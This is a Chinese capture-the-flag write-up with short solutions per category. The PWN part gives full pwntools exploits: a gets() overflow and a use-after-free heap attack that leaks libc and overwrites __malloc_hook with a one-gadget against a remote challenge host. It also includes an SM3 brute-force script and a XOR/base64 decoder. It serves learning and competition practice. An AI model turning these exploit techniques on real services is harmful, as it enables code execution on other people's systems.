PWN

签到

利用 gets 的溢出覆盖到 s1,把它改成 admin

from pwn import *

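# pwntools global settings: 64-bit Linux target, verbose wire-level logging.
context(arch='amd64', os='linux', log_level='debug')

# Path of the challenge binary; used for the local process and for ELF parsing.
file_name = './pwn'


def li(x):
    """Print *x* in bold using ANSI 256-colour code 214."""
    print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')


def ll(x):
    """Print *x* in bold using ANSI 256-colour code 1."""
    print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')


# Terminal command pwntools uses when it has to open a new window
# (here: a horizontal tmux split).
context.terminal = ['tmux', 'splitw', '-h']

# NOTE: despite its name, a truthy `debug` selects the remote service and a
# falsy value runs the local binary.
debug = 0
if debug:
    r = remote('node4.buuoj.cn', 26870)
else:
    r = process(file_name)

elf = ELF(file_name)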

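def dbg():
    """Attach gdb to the tube ``r`` via pwntools' ``gdb.attach``."""
    gdb.attach(r)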

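def get_libc():
    """Read from ``r`` up to a 0x7f byte and return the last 6 bytes as an int.

    The 6 bytes are zero-padded to 8 and unpacked with ``u64``.
    NOTE(review): presumably the value is a leaked libc pointer, as the
    function name suggests - confirm against the program's output.
    """
    leak = r.recvuntil(b'\x7f')[-6:]
    return u64(leak.ljust(8, b'\x00'))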

# Input line: 0x10 filler bytes followed by b'admin'. Per the write-up the
# target reads it with gets(), which has no length limit, so the bytes after
# the filler end up in the neighbouring s1. Reading with a bounded call
# (e.g. fgets with the buffer size) removes the overflow.
# NOTE(review): 0x10 is presumably the distance from the buffer to s1 - confirm.
filler = b'a' * 0x10
p = filler + b'admin'
r.sendline(p)

# Hand the session over to the terminal.
r.interactive()

eznote

free 处存在 UAF,打 __malloc_hook

from pwn import *

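# pwntools global settings: 64-bit Linux target, verbose wire-level logging.
context(arch='amd64', os='linux', log_level='debug')

# Path of the challenge binary; used when running it as a local process.
file_name = './pwn'


def li(x):
    """Print *x* in bold using ANSI 256-colour code 214."""
    print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')


def ll(x):
    """Print *x* in bold using ANSI 256-colour code 1."""
    print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')


# Terminal command pwntools uses when it has to open a new window
# (here: a horizontal tmux split).
context.terminal = ['tmux', 'splitw', '-h']

# NOTE: despite its name, a truthy `debug` selects the remote service and a
# falsy value runs the local binary.
debug = 1
if debug:
    r = remote('221.178.230.105', 36682)
else:
    r = process(file_name)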

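def dbg():
    """Attach gdb to the tube ``r`` via pwntools' ``gdb.attach``."""
    gdb.attach(r)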

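def get_libc():
    """Read from ``r`` up to a 0x7f byte and return the last 6 bytes as an int.

    The 6 bytes are zero-padded to 8 and unpacked with ``u64``.
    NOTE(review): presumably the value is a leaked libc pointer, as the
    function name suggests - confirm against the program's output.
    """
    leak = r.recvuntil(b'\x7f')[-6:]
    return u64(leak.ljust(8, b'\x00'))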

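def add(size, content):
    """Select menu option 1, then answer the ``size`` and ``data`` prompts.

    Args:
        size: Requested size; sent as its decimal text.
        content: Bytes sent after the ``data`` prompt.
    """
    r.sendlineafter(b'choice', b'1')
    # Encode explicitly: pwntools tubes operate on bytes, and passing a str
    # raises a BytesWarning under Python 3.
    r.sendlineafter(b'size', str(size).encode())
    r.sendlineafter(b'data', content)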

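def edit(index, content):
    """Select menu option 3, then answer the ``index`` and ``data`` prompts.

    Args:
        index: Entry index; sent as its decimal text.
        content: Bytes sent after the ``data`` prompt.
    """
    r.sendlineafter(b'choice', b'3')
    # Encode explicitly: pwntools tubes operate on bytes, and passing a str
    # raises a BytesWarning under Python 3.
    r.sendlineafter(b'index', str(index).encode())
    r.sendlineafter(b'data', content)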

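def show(index):
    """Select menu option 4 and answer the ``index`` prompt.

    The program's reply is left unread on the tube for the caller.

    Args:
        index: Entry index; sent as its decimal text.
    """
    r.sendlineafter(b'choice', b'4')
    # Encode explicitly: pwntools tubes operate on bytes, and passing a str
    # raises a BytesWarning under Python 3.
    r.sendlineafter(b'index', str(index).encode())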

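def delete(index):
    """Select menu option 2 and answer the ``index`` prompt.

    Args:
        index: Entry index; sent as its decimal text.
    """
    r.sendlineafter(b'choice', b'2')
    # Encode explicitly: pwntools tubes operate on bytes, and passing a str
    # raises a BytesWarning under Python 3.
    r.sendlineafter(b'index', str(index).encode())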

# Two initial allocations through the program's "add" menu option.
# How the program numbers its entries is not visible in this script.
add(0x100, b'a')
add(0x10, b'a')

# Entry 0 is deleted and then read back through "show". The read only yields
# data because the program keeps the entry usable after free (the UAF named
# in the write-up); clearing the stored pointer on delete would stop it.
delete(0)
show(0)

# A fixed offset is subtracted from the value read back to obtain the libc
# load base. 0x3c4b78 and the offsets below belong to the specific libc-2.23
# build loaded here and do not carry over to other builds.
# NOTE(review): presumably the leaked value is an allocator pointer left in
# the freed chunk - confirm against the binary.
libc_base = get_libc() - 0x3c4b78
libc = ELF('./2.23-11/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook = libc.sym['__malloc_hook'] + libc_base
# Four candidate libc offsets, of which the last is used.
# NOTE(review): presumably one-gadget offsets for this libc build - confirm.
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
ogg = one[3] + libc_base

# Second use of the same flaw, this time as a write: entry 1 is deleted and
# then modified through "edit", which stores an address 0x23 bytes below
# __malloc_hook into the freed entry. The last add() sends 0x13 filler bytes
# followed by `ogg`.
# Defensive reading: both the read and the write disappear if delete() clears
# the stored pointer and show()/edit() reject entries that were freed.
add(0x60, b'a')
delete(1)
edit(1, p64(malloc_hook - 0x23))
add(0x60, b'a')
add(0x60, b'a' * 0x13 + p64(ogg))

# One more "add" request with size 1, sent by hand because the program is not
# expected to reach the data prompt. glibc 2.34 removed __malloc_hook, so
# this hook-based control-flow path exists only in older libc builds.
r.sendlineafter(b'choice', b'1')
r.sendlineafter(b'size', b'1')

# Hand the session over to the terminal.
r.interactive()

CRYPTO

easy-sm

直接爆破直到找到为止

from gmssl import sm3, func

# Target SM3 digest (hex string) that a candidate password must reproduce.
hash_to_match = "f1127f0189ad9e1bde949fb14991db82c9c9b41e90edcf014898595e8ab908c0"

# Upper bound on the number of candidates to try.
max_attempts = 10 ** 6

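def generate_password(base, attempt):
    """Return *base* followed by *attempt* zero-padded to at least six digits.

    >>> generate_password("admin", 42)
    'admin000042'
    """
    return f"{base}{attempt:06d}"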

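def compute_sm3_hash(data):
    """Return the SM3 digest of the UTF-8 encoding of *data*, as gmssl reports it.

    gmssl's ``sm3_hash`` takes a list of byte values, hence the
    ``bytes_to_list`` conversion.
    """
    encoded = data.encode('utf-8')
    return sm3.sm3_hash(func.bytes_to_list(encoded))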

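# Exhaustive search over "admin" followed by a zero-padded six-digit counter.
# The candidate space is only max_attempts values and the digest is a single
# unsalted SM3 pass, so the whole range is cheap to enumerate; password
# storage should use a salted, deliberately slow KDF instead.
for attempt in range(max_attempts):
    password = generate_password("admin", attempt)
    hash_value = compute_sm3_hash(password)

    if hash_value == hash_to_match:
        print(f"匹配的密码已找到: {password}")
        break
else:
    # The original printed nothing when the range was exhausted.
    print("未找到匹配的密码")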

MISC

keyboard

流量分析工具一把梭

bft

使用 bftools 工具从图片中提取出 brainfuck 代码,对 brainfuck 解码之后再进行 base64 解码

REVERSE

签到

ida打开就有flag

HappySunday

存在异或加密,base64换表

import base64
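# Encoded byte values as listed in the write-up.
# NOTE(review): presumably copied out of the binary - confirm.
res = [
    0x7A, 0x36, 0x17, 0x3A, 0x34, 0x35, 0x49, 0x40, 0x17, 0x20, 0x49, 0x31,
    0x2, 0x2D, 0x2, 0x1C, 0x1E, 0x35, 0x3D, 0x4D, 0x1E, 0x1B, 0x49, 0x2E, 0x0D,
    0x2A, 0x3C, 0x2A, 0x4D, 0x2D, 0x2,
]

# Undo the single-byte XOR (key 0x78) on every element. The result is the
# base64 text that the write-up then decodes with the custom alphabet.
# NOTE(review): res[0] (0x7A) decodes to 0x02, a non-printable byte - verify
# the first table entry against the binary.
flag = ''.join(chr(value ^ 0x78) for value in res)
print(flag)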

得到base64字符串再解base64

WEB

签到

shiro工具一把梭